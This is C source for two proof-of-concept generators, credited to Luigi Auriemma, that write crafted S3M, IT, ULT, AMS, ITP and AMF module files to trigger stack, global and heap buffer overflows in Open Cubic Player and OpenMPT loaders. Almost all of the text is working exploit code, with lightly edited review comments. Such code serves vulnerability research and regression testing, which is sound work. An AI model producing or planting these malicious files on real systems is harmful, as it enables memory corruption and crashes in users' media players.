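/*
 * PoC generator: writes ONE crafted module file that triggers one of four
 * loader overflows in Open Cubic Player (see the usage text for the list).
 * The file is only useful for reproducing the crash in a test setup; the
 * bytes written below are the payload and must stay exactly as they are.
 *
 * argv[1] = attack number (1..4), argv[2] = output path.
 * Returns 0 on success. Exits with status 1 on a usage error or an unknown
 * attack number, and via std_err() when the output file cannot be opened
 * or flushed.
 *
 * Depends on definitions earlier in the file that are not visible here:
 * the header structs (s3m_t, it_t, ams_t), the fw* write helpers,
 * std_err(), POCNAME, AMSNAMELEN and VER.
 */
int main(int argc, char *argv[]) {
    FILE    *fd;
    s3m_t   s3m;
    it_t    it;
    ams_t   ams;
    int     i,
            j,
            tmp,
            attack;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    /* both arguments are mandatory: argv[2] is dereferenced below */
    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in mpLoadS3M        (*.S3M)\n"
            " 2 = buffer-overflow in itload.cpp       (*.IT)\n"
            " 3 = buffer-overflow in mpLoadULT        (*.ULT)\n"
            " 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    fname  = argv[2];

    /* Reject a bad attack number BEFORE creating the output file: the old
       flow opened the file first, so a typo left an empty file behind and
       still printed "- finished" with exit status 0. */
    if((attack < 1) || (attack > 4)) {
        printf("\nError: you must specify the right attack number\n");
        exit(1);
    }

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {

        /* S3M header: oversized order count; the loader reads ordnum
           bytes of orders after the header. strncpy is used on purpose
           here (fixed-width field, no terminator wanted). */
        memset(&s3m, 0, sizeof(s3m));
        strncpy(s3m.name,  POCNAME, sizeof(s3m.name));
        s3m.kennung = 0x1a;
        s3m.typ     = 16;
        s3m.ordnum  = 800;
        memcpy(s3m.scrm, "SCRM", 4);

        fwrite(&s3m, sizeof(s3m), 1, fd);

        for(i = 0; i < s3m.ordnum - 1; i++) fputc('a', fd);
        fputc(0, fd);                                   // for forcing "return errFormMiss"

    } else if(attack == 2) {

        /* IT header with an oversized order list. Setting InsNum to 200
           instead (see the commented line) is an alternative trigger for
           the same class of overflow; both are left as in the original. */
        memset(&it, 0, sizeof(it));
        memcpy(it.sign, "IMPM", 4);
        strncpy(it.name, POCNAME, sizeof(it.name));
        it.Cmwt   = 0x200;
        it.OrdNum = 1000;                               // buffer-overflow
//        it.InsNum = 200;                                // buffer-overflow

        fwrite(&it, sizeof(it), 1, fd);

        for(i = 0; i < 64;        i++) fwi08(fd, 0);
        for(i = 0; i < 64;        i++) fwi08(fd, 0);
        for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
        for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');

    } else if(attack == 3) {

        /* ULT: channel count (chnn) of 0x7f followed by chnn bytes of
           panning data is what overflows in mpLoadULT. */
        fwmem(fd, "MAS_UTrack_V00", 14);
        fwi08(fd, 3 + '1');
        fwstx(fd, POCNAME, 32);
        fwi08(fd, 0);                                   // msglen
        fwi08(fd, 0);                                   // insnum
        fwbof(fd, 256, 0);                              // orders
        tmp = 0x7f;
        fwi08(fd, tmp);                                 // chnn
        fwi08(fd, 0);                                   // patn
        fwbof(fd, tmp, 'a');                            // buffer-overflow

            // possible heap overflow with chbp, patlength = 0

    } else if(attack == 4) {

        /* AMS: one instrument whose three envelopes each declare 0xff
           points (3 bytes per point) - the "envs" overflow. */
        fwmem(fd, "AMShdr\x1A", 7);                     // sig
        fwi08(fd, AMSNAMELEN);                          // sig[7]
        fwbof(fd, AMSNAMELEN, 'a');                     // name
        fwi16(fd, 0x202);                               // filever

        memset(&ams, 0, sizeof(ams));
        ams.ins = 1;

        fwrite(&ams, sizeof(ams), 1, fd);

        for(j = 0; j < ams.ins; j++) {
            fwi08(fd, AMSNAMELEN);                      // namelen
            fwbof(fd, AMSNAMELEN, 'a');                 // name
            fwi08(fd, 1);                               // smpnum

            fwbof(fd, 120, 0);                          // samptab

            for(i = 0; i < 3; i++) {                    // envs
                tmp = 0xff;
                fwi08(fd, 0);                           // speed
                fwi08(fd, 0);                           // sustain
                fwi08(fd, 0);                           // loopstart
                fwi08(fd, 0);                           // loopend
                fwi08(fd, tmp);                         // points
                fwbof(fd, tmp * 3, 'a');
            }
        }
    }

    /* fclose() flushes the buffered payload; if that fails the file on
       disk is truncated, so report it rather than print "- finished". */
    if(fclose(fd)) std_err();
    printf("- finished\n");
    return(0);
}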
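/*
 * PoC generator: writes ONE crafted file that triggers either the ITP
 * global-buffer overflows (attack 1) or the AMF ReadSample heap overflow
 * (attack 2) in OpenMPT. The bytes written are the payload and must be
 * kept exactly as they are.
 *
 * argv[1] = attack number (1 or 2), argv[2] = output path.
 * Returns 0 on success. Exits with status 1 on a usage error or an unknown
 * attack number, and via std_err() when the output file cannot be opened
 * or flushed.
 *
 * Depends on definitions earlier in the file that are not visible here:
 * amf_head_t, amf_smp_t, the fw* write helpers, std_err(), VER,
 * ITPHEAPOVERSZ, SONG_ITPROJECT, ALLOCSAMPLESZ and HEAPOVERSZ.
 */
int main(int argc, char *argv[]) {
    amf_head_t      amf_head;
    amf_smp_t       amf_smp;
    FILE    *fd;
    int     i,
            attack;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
          "OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows "VER"\n"
          "by Luigi Auriemma\n"
          "e-mail: [email protected]\n"
          "web:    aluigi.org\n"
          "\n", stdout);

    /* Bug fix: the check was "argc < 2", so running with only the attack
       number passed argv[2] (NULL) to fopen() below. Both arguments are
       required. */
    if(argc < 3) {
        printf("\n"
               "Usage: %s <attack> <output_file>\n"
               "\n"
               "Attacks:\n"
               " 1 = various global buffer overflows in ReadITProject (*.ITP)\n"
               " 2 = heap overflow in ReadSample                      (*.AMF)\n"
               "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    fname  = argv[2];

    /* An unknown attack number used to silently produce an empty output
       file and print "- finished"; reject it before touching the disk. */
    if((attack != 1) && (attack != 2)) {
        printf("\nError: you must specify the right attack number\n");
        exit(1);
    }

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {
        /* ITP: an oversized song-name length followed by that many bytes;
           every later length field is zero so nothing else is parsed. */
        fwi32(fd, 0x2e697470);          // .itp
        fwi32(fd, 0x00000000);          // version
        fwi32(fd, ITPHEAPOVERSZ);       // song name len
        fwbof(fd, ITPHEAPOVERSZ, 'a');  // song name
        fwi32(fd, 0);                   // comments len
        fwi32(fd, SONG_ITPROJECT);      // m_dwSongFlags
        fwi32(fd, 128);                 // m_nDefaultGlobalVolume
        fwi32(fd, 0);                   // m_nSongPreAmp
        fwi32(fd, 0);                   // m_nDefaultSpeed
        fwi32(fd, 0);                   // m_nDefaultTempo
        fwi32(fd, 0);                   // m_nChannels
        fwi32(fd, 0);                   // channel name len
        // no per-channel data follows: m_nChannels is 0
        fwi32(fd, 0);                   // LoadMixPlugins len
        fwi32(fd, 0);                   // m_MidiCfg len
        fwi32(fd, 0);                   // m_nInstruments
        fwi32(fd, 0);                   // path instruments len
        fwi32(fd, 0);                   // order len
        fwi32(fd, 0);                   // number of patterns
        fwi32(fd, 0);                   // m_nPatternNames
        fwi32(fd, 0);                   // m_lpszPatternNames len
        fwi32(fd, 0);                   // modcommand data length
        fwi32(fd, 0);                   // m_nSamples
        fwi32(fd, 0);                   // Read number of embeded samples

    } else if(attack == 2) {
        memset(&amf_head, 0, sizeof(amf_head));
        memset(&amf_smp,  0, sizeof(amf_smp));

        /* NOTE(review): amf_head.sign must hold the 24-byte signature plus
           the terminator strcpy writes; its declared size is not visible
           here - confirm against amf_head_t. */
        strcpy(amf_head.sign, "ASYLUM Music Format V1.0");
        amf_head.patterns = 1;
        amf_head.orders   = 1;
        fwrite(&amf_head, sizeof(amf_head), 1, fd);

        /* 64 sample headers, each with a negative length; the original
           comment attributes the overflow to how ReadSample/AllocateSample
           use that value. The name is written bounded (snprintf) so the
           header struct can never be overrun from here. */
        for(i = 0; i < 64; i++) {
            snprintf(amf_smp.name, sizeof(amf_smp.name), "sample %d", i);
            amf_smp.finetune = 0;
            amf_smp.volume   = 64;
            amf_smp.length   = ((0 - 6) - 39) + 16; // ReadSample and AllocateSample
            amf_smp.reppos   = 0;
            amf_smp.replen   = 0;
            fwrite(&amf_smp, sizeof(amf_smp), 1, fd);
        }

        fwbof(fd, 64 * 32, 0x00);       // order list

        fwbof(fd, ALLOCSAMPLESZ + HEAPOVERSZ, 'a');     // sample data that overruns the allocation
    }

    /* fclose() flushes the buffered payload; a failure means the file is
       truncated, so report it instead of claiming success. */
    if(fclose(fd)) std_err();
    printf("- finished\n");
    return(0);
}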